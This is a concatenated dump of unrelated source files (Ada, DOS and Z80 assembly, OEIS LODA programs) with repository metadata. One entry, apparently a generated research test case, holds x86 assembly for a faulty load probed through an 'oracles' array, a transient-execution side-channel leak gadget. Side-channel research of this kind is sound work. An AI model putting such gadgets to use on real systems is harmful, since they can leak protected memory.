00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */

src/numerics-sparse_matrices-n_row.adb

sciencylab/lagrangian-solver

0

4021

separate (Numerics.Sparse_Matrices) function N_Row (Mat : in Sparse_Matrix) return Pos is begin return Mat.N_Row; end N_Row;

Transynther/x86/_processed/NONE/_xt_sm_/i9-9900K_12_0xca_notsx.log_21829_274.asm

ljhsiun2/medusa

9

21483

<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r10 push %r8 push %r9 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_WC_ht+0x143b5, %rsi lea addresses_A_ht+0xddf1, %rdi nop nop nop nop nop and $20401, %rbp mov $0, %rcx rep movsw xor %rax, %rax lea addresses_normal_ht+0x1a371, %rcx nop nop nop nop nop sub %r10, %r10 and $0xffffffffffffffc0, %rcx movaps (%rcx), %xmm4 vpextrq $0, %xmm4, %rbp nop nop nop nop and $30277, %rdi lea addresses_normal_ht+0x6b71, %rsi lea addresses_normal_ht+0x546f, %rdi dec %r8 mov $63, %rcx rep movsl nop dec %rcx lea addresses_UC_ht+0x1bb51, %rsi nop nop nop nop cmp $41024, %r10 movb $0x61, (%rsi) nop nop sub $44919, %rsi lea addresses_D_ht+0xcab1, %rsi lea addresses_UC_ht+0xdc2a, %rdi dec %r9 mov $35, %rcx rep movsb sub %r10, %r10 lea addresses_D_ht+0xbb67, %rbp nop nop nop xor $32430, %rdi mov $0x6162636465666768, %rsi movq %rsi, %xmm6 movups %xmm6, (%rbp) nop nop and $37814, %rdi lea addresses_WT_ht+0x4771, %r10 clflush (%r10) nop nop nop nop nop sub $29542, %r8 movw $0x6162, (%r10) nop nop inc %rbp lea addresses_WC_ht+0x4871, %rsi lea addresses_WC_ht+0x10f71, %rdi nop nop cmp $59242, %r9 mov $4, %rcx rep movsl add %rcx, %rcx lea addresses_WT_ht+0x939b, %rsi lea addresses_normal_ht+0x15171, %rdi nop nop nop nop nop cmp %r8, %r8 mov $89, %rcx rep movsw nop nop cmp %r9, %r9 lea addresses_A_ht+0x13f1, %rsi lea addresses_A_ht+0x9b71, %rdi nop nop nop nop dec %rax mov $49, %rcx rep movsq nop nop nop nop nop dec %r9 lea addresses_D_ht+0x4859, %rcx nop nop nop add $26404, %rsi mov (%rcx), %r9d nop cmp %rdi, %rdi pop %rsi pop %rdi pop %rcx pop %rbp pop %rax pop %r9 pop %r8 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r8 push %rax push %rbp push %rbx push %rdi push %rdx // Store lea addresses_A+0x1ccf1, %rbx nop nop nop nop nop dec %rax mov $0x5152535455565758, %r10 movq %r10, (%rbx) nop dec %r8 // Store lea addresses_D+0xeb71, %rbx nop nop nop nop add $32687, %rdi movw $0x5152, (%rbx) nop inc %r10 // Store mov $0xb3b, %rbx nop nop nop nop add %r8, %r8 movb $0x51, (%rbx) nop sub $49543, %r8 // Store lea addresses_WC+0x1025d, %rbp nop nop nop nop dec %rdx movw $0x5152, (%rbp) nop nop nop nop dec %rbp // Load lea addresses_D+0x1c171, %rbp clflush (%rbp) nop nop nop nop cmp $32030, %rax vmovups (%rbp), %ymm0 vextracti128 $1, %ymm0, %xmm0 vpextrq $1, %xmm0, %r8 nop nop nop nop nop sub %rbx, %rbx // Store lea addresses_normal+0xe5d1, %r8 nop nop nop sub $65409, %rax movb $0x51, (%r8) nop nop cmp %rbp, %rbp // Store lea addresses_RW+0xdca1, %rdx nop nop nop nop xor %rdi, %rdi mov $0x5152535455565758, %r8 movq %r8, %xmm3 movups %xmm3, (%rdx) nop nop nop and $64962, %rdi // Faulty Load lea addresses_D+0xeb71, %rbp clflush (%rbp) nop cmp $25622, %rdx movups (%rbp), %xmm2 vpextrq $0, %xmm2, %r8 lea oracles, %rbx and $0xff, %r8 shlq $12, %r8 mov (%rbx,%r8,1), %r8 pop %rdx pop %rdi pop %rbx pop %rbp pop %rax pop %r8 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 0}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_A', 'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 5}} {'OP': 'STOR', 'dst': {'same': True, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 0}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_P', 'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 1}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_WC', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 0}} {'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 9}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_normal', 'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 5}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_RW', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 3}} [Faulty Load] {'OP': 'LOAD', 'src': {'same': True, 'type': 'addresses_D', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 0}} <gen_prepare_buffer> {'OP': 'REPM', 'src': {'same': False, 'congruent': 1, 'type': 'addresses_WC_ht'}, 'dst': {'same': False, 'congruent': 5, 'type': 'addresses_A_ht'}} {'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_normal_ht', 'NT': False, 'AVXalign': True, 'size': 16, 'congruent': 11}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 11, 'type': 'addresses_normal_ht'}, 'dst': {'same': False, 'congruent': 1, 'type': 'addresses_normal_ht'}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_UC_ht', 'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 5}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 6, 'type': 'addresses_D_ht'}, 'dst': {'same': False, 'congruent': 0, 'type': 'addresses_UC_ht'}} {'OP': 'STOR', 'dst': {'same': False, 'type': 'addresses_D_ht', 'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 1}} {'OP': 'STOR', 'dst': {'same': True, 'type': 'addresses_WT_ht', 'NT': False, 'AVXalign': False, 'size': 2, 'congruent': 5}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 5, 'type': 'addresses_WC_ht'}, 'dst': {'same': False, 'congruent': 10, 'type': 'addresses_WC_ht'}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 1, 'type': 'addresses_WT_ht'}, 'dst': {'same': False, 'congruent': 9, 'type': 'addresses_normal_ht'}} {'OP': 'REPM', 'src': {'same': False, 'congruent': 7, 'type': 'addresses_A_ht'}, 'dst': {'same': False, 'congruent': 9, 'type': 'addresses_A_ht'}} {'OP': 'LOAD', 'src': {'same': False, 'type': 'addresses_D_ht', 'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 2}} {'52': 21829} 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 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3-Assemble(80x86)/lab-2/lab2.asm

ftxj/4th-Semester

0

21151

.386 STACK SEGMENT USE16 STACK DB 300 DUP(0) STACK ENDS DATA SEGMENT USE16 N EQU 30 POIN DW 0 BUF DB 'zhangsan', 0, 0 DB 0, 0, 0, ? DB 'lisi', 6 DUP(0) DB 80, 100, 70, ? DB 'B',0,0,0,0,0,0,0,0,0 DB 10, 20, 12, ? DB N-4 DUP('TempValue',0, 80, 90, 95, ?) DB 'xinjie', 0, 0, 0, 0 DB 100, 100, 100, ? IN_NAME DB 10 DB 0 DB 10 DUP(0) STRING DB 300 DUP(0) CRLF DB 0DH, 0AH, '$' MSG1 DB 0AH, 0DH, 'Please Input Name :$' MSG2 DB 0AH, 0DH, 'Not Find This Student!:$' MSG3 DB 'Rank: ' DIVID DB 7 DUP(0) db 7 dup(1) db 7 dup(2) db 7 dup(3) db 7 dup(4) db 7 dup(5) db 7 dup(6) db 7 dup(7) db 7 dup(8) db 7 dup(9) db 7 dup(10) db 7 dup(11) db 7 dup(12) db 7 dup(13) db 7 dup(14) db 7 dup(15) db 7 dup(16) db 7 dup(17) db 7 dup(18) db 7 dup(19) db 7 dup(20) db 7 dup(21) db 7 dup(22) db 7 dup(23) db 7 dup(24) db 7 dup(25) db 7 dup(26) db 7 dup(27) db 7 dup(28) db 7 dup(29) db 7 dup(30) db 7 dup(31) db 7 dup(32) db 7 dup(33) db 7 dup(34) db 7 dup(35) db 7 dup(36) db 7 dup(37) db 7 dup(38) db 7 dup(39) db 7 dup(40) db 7 dup(41) db 7 dup(42) db 7 dup(43) db 7 dup(44) db 7 dup(45) db 7 dup(46) db 7 dup(47) db 7 dup(48) db 7 dup(49) db 7 dup(50) db 7 dup(51) db 7 dup(52) db 7 dup(53) db 7 dup(54) db 7 dup(55) db 7 dup(56) db 7 dup(57) db 7 dup(58) db 7 dup(59) db 7 dup(60) db 7 dup(61) db 7 dup(62) db 7 dup(63) db 7 dup(64) db 7 dup(65) db 7 dup(66) db 7 dup(67) db 7 dup(68) db 7 dup(69) db 7 dup(70) db 7 dup(71) db 7 dup(72) db 7 dup(73) db 7 dup(74) db 7 dup(75) db 7 dup(76) db 7 dup(77) db 7 dup(78) db 7 dup(79) db 7 dup(80) db 7 dup(81) db 7 dup(82) db 7 dup(83) db 7 dup(84) db 7 dup(85) db 7 dup(86) db 7 dup(87) db 7 dup(88) db 7 dup(89) db 7 dup(90) db 7 dup(91) db 7 dup(92) db 7 dup(93) db 7 dup(94) db 7 dup(95) db 7 dup(96) db 7 dup(97) db 7 dup(98) db 7 dup(99) db 7 dup(100) DATA ENDS CODE SEGMENT USE16 ASSUME DS:DATA, CS:CODE, SS:STACK START: MOV AX, DATA MOV DS, AX INPUT: MOV DX, OFFSET MSG1 MOV AH, 9 INT 21H ;功能一一小题 LEA DX, IN_NAME MOV AH, 10 INT 21H ;功能一二小题 MOV BL, IN_NAME + 1 MOV BH, IN_NAME + 2 CMP BL, 0 JE INPUT CMP BH, 'q' JE DIE ;功能一三小题 MOV BH, 0 MOV CX, 10 SUB CX, BX PP: MOV [IN_NAME + BX + 2], 0 INC BX LOOP PP mov ax,0 call TIMER mov cx, 5000 work1: push cx MOV DI, -14 FIND: MOV CX, N ADD DI, 14 FIND_S: MOV EAX, DWORD PTR [IN_NAME + 2] CMP EAX, DWORD PTR [BUF + DI] JNE CON MOV EBX, DWORD PTR [IN_NAME + 6] CMP EBX, DWORD PTR [BUF + DI + 4] JNE CON MOV DX, WORD PTR [IN_NAME + 10] CMP DX, WORD PTR [BUF + DI + 8] JE SUCCESS_FIND CON: CMP CX, 0 JE NOT_FIND LOOP FIND DIE: MOV AH, 4CH INT 21H NOT_FIND: MOV DX, OFFSET MSG2 MOV AH, 9 INT 21H JMP INPUT SUCCESS_FIND: MOV WORD PTR [POIN], OFFSET BUF + 10 ADD WORD PTR [POIN], DI CALL SET_AVERANGE_GRADE pop cx loop work1 mov ax,1 call TIMER CALL G_ABCD JMP INPUT G_ABCD: PUSH AX PUSH DX PUSH SI MOV SI, [POIN] ADD SI, 3 MOV AX, [SI] MOV AH, 0 SUB AL, 90 JS G_BCD MOV DL, 'A' JMP SCREEN G_BCD: MOV AX, [SI] MOV AH, 0 SUB AL, 80 JS G_CD MOV DL, 'B' JMP SCREEN G_CD: MOV AX, [SI] MOV AH, 0 SUB AL, 70 JS G_D MOV DL, 'C' JMP SCREEN G_D: MOV DL, 'D' JMP SCREEN SCREEN: MOV AH, 2 INT 21H POP SI POP DX POP AX RET SET_AVERANGE_GRADE: MOV SI, 10 MOV CX, N MATH: MOV EDX, DWORD PTR [BUF + SI] MOVZX BX, DL ;Chinese Grade SHL BX, 1 MOVZX AX, DH ;MATH GRADE ADD BX, AX SHR EDX, 8 MOV AL, DH ;ENGLISH SHR AX, 1 ADD BX, AX SHL BX, 1 MOVZX AX, BYTE PTR [BX + DIVID] MOV [BUF + SI + 3], AL ADD SI, 14 LOOP MATH RET ;时间计数器(ms),在屏幕上显示程序的执行时间(ms) ;使用方法: ; MOV AX, 0 ;表示开始计时 ; CALL TIMER ; ... ... ;需要计时的程序 ; MOV AX, 1 ; CALL TIMER ;终止计时并显示计时结果(ms) ;输出: 改变了AX和状态寄存器 TIMER PROC PUSH DX PUSH CX PUSH BX MOV BX, AX MOV AH, 2CH INT 21H ;CH=hour(0-23),CL=minute(0-59),DH=second(0-59),DL=centisecond(0-100) MOV AL, DH MOV AH, 0 IMUL AX,AX,1000 MOV DH, 0 IMUL DX,DX,10 ADD AX, DX CMP BX, 0 JNZ _T1 MOV CS:_TS, AX _T0: POP BX POP CX POP DX RET _T1: SUB AX, CS:_TS JNC _T2 ADD AX, 60000 _T2: MOV CX, 0 MOV BX, 10 _T3: MOV DX, 0 DIV BX PUSH DX INC CX CMP AX, 0 JNZ _T3 MOV BX, 0 _T4: POP AX ADD AL, '0' MOV CS:_TMSG[BX], AL INC BX LOOP _T4 PUSH DS MOV CS:_TMSG[BX+0], 0AH MOV CS:_TMSG[BX+1], 0DH MOV CS:_TMSG[BX+2], '$' LEA DX, _TS+2 PUSH CS POP DS MOV AH, 9 INT 21H POP DS JMP _T0 _TS DW ? DB 0AH, 0DH, 'Time elapsed in ms is ' _TMSG DB 12 DUP(0) TIMER ENDP CODE ENDS END START

tests/nonsmoke/functional/CompileTests/experimental_ada_tests/tests/dynamic_array.adb

ouankou/rose

488

19653

procedure dynamic_array is type OpenArray is array (Natural range <>) of Integer; subtype ShortArray is OpenArray(1..4); type ItemArray is access ShortArray; Items : ItemArray := new ShortArray; begin Items.all := ShortArray'(others => 0); end dynamic_array;

oeis/179/A179905.asm

neoneye/loda-programs

11

176415

; A179905: (1, 4, 7, 10, 13,...) convolved with (1, 0, 4, 7, 10, 13...); given A016777 = (1, 4, 7, 10, 13,...). ; Submitted by <NAME>(s4) ; 1,4,11,33,79,158,279,451,683,984,1363,1829,2391,3058,3839,4743,5779,6956,8283,9769,11423,13254,15271,17483,19899,22528,25379,28461,31783,35354,39183,43279,47651,52308,57259,62513,68079,73966,80183,86739,93643,100904,108531,116533,124919,133698,142879,152471,162483,172924,183803,195129,206911,219158,231879,245083,258779,272976,287683,302909,318663,334954,351791,369183,387139,405668,424779,444481,464783,485694,507223,529379,552171,575608,599699,624453,649879,675986,702783,730279,758483,787404 mov $4,$0 lpb $0 mov $0,0 add $1,2 lpe mov $2,$4 add $2,8 add $1,$2 mov $3,$4 bin $3,2 mul $3,$4 mov $2,$3 mul $2,3 add $1,$2 mov $0,$1 sub $0,7

oeis/027/A027024.asm

neoneye/loda-programs

11

1099

<reponame>neoneye/loda-programs ; A027024: a(n) = T(n,n+2), T given by A027023. ; Submitted by <NAME>(s4) ; 1,5,13,27,53,101,189,351,649,1197,2205,4059,7469,13741,25277,46495,85521,157301,289325,532155,978789,1800277,3311229,6090303,11201817,20603357,37895485,69700667,128199517,235795677,433695869,797691071,1467182625,2698569573,4963443277,9129195483,16791208341,30883847109,56804250941,104479306399,192167404457,353450961805,650097672669,1195716038939,2199264673421,4045078385037,7440059097405,13684402155871,25169539638321,46294000891605,85147942685805,156611483215739,288053426793157,529812852694709 add $0,2 seq $0,8937 ; a(n) = Sum_{k=0..n} T(k) where T(n) are the tribonacci numbers A000073. mul $0,2 sub $0,3

oeis/145/A145543.asm

neoneye/loda-programs

11

244665

; A145543: Denominators in continued fraction expansion of sqrt(3/5). ; Submitted by <NAME> ; 1,4,9,31,71,244,559,1921,4401,15124,34649,119071,272791,937444,2147679,7380481,16908641,58106404,133121449,457470751,1048062951,3601659604,8251382159,28355806081,64962994321,223244789044,511452572409,1757602506271,4026657584951 seq $0,41022 ; Numerators of continued fraction convergents to sqrt(15). dif $0,3

src/DisplayFailingBits.asm

gschizas/amstrad-diagnostics

60

21390

<gh_stars>10-100 INCLUDE "Colors.asm" ColorBackground EQU ColorBlack ColorNumber EQU ColorWhite ColorGood EQU ColorLime ColorBad EQU ColorBrightRed DisplayFailingBits: di ; Turn the whole screen into a giant border ; out &bc00,6:out &bd00,0 ld bc,#bc06 out (c),c ld bc,#bd00 out (c),c ;; Select color 0 register ld bc, #7F00 out (c), c ld c, ColorBlack out (c), c ; Wait for Vsync .frameLoop: ld b,#f5 .vbLoop1 in a,(c) rra jr c,.vbLoop1 .vbLoop2 in a,(c) rra jr nc,.vbLoop2 ;; Select Border color register ld bc, #7F10 out (c), c ld c, ColorBackground out (c), c ld bc, #6103 .waitLoop: djnz .waitLoop ; [3] dec c ; [1] jr nz, .waitLoop ; [3] ld bc, #7F10 out (c), c ld c, ColorBackground ld h, ColorNumber ; out (c), h DEFINE F #ed,#61, ; out (c), c DEFINE _ #ed,#49, ; out (c), l DEFINE B #ed,#69, DEFINE EOL , #ed,#49, #ed,#49 /* ld a,#f ; [2] .testLoop: dec a ; [1] jr nz,.testLoop ; [3] / [2] nop nop nop */ DEFINE WAIT16 #3E, #0f, #3D, #20, #fD, 0, 0, 0 DEFINE WAIT12 #3E, #0b, #3D, #20, #fD, 0, 0, 0 DEFINE WAIT9 #3E, #08, #3D, #20, #fD, 0, 0, 0 INCLUDE "ColorChange.asm" db WAIT16 db WAIT16 db WAIT16 ; 0 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 1 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 2 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 3 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 4 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 5 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 6 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 7 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 UNDEFINE F UNDEFINE _ UNDEFINE B UNDEFINE EOL nop nop nop nop nop nop jp .frameLoop

libsrc/_DEVELOPMENT/math/float/math48/lm/z80/asm_dlt_s.asm

jpoikela/z88dk

640

243160

SECTION code_clib SECTION code_fp_math48 PUBLIC asm_dlt_s EXTERN am48_dlt_s defc asm_dlt_s = am48_dlt_s

oeis/052/A052972.asm

neoneye/loda-programs

11

164031

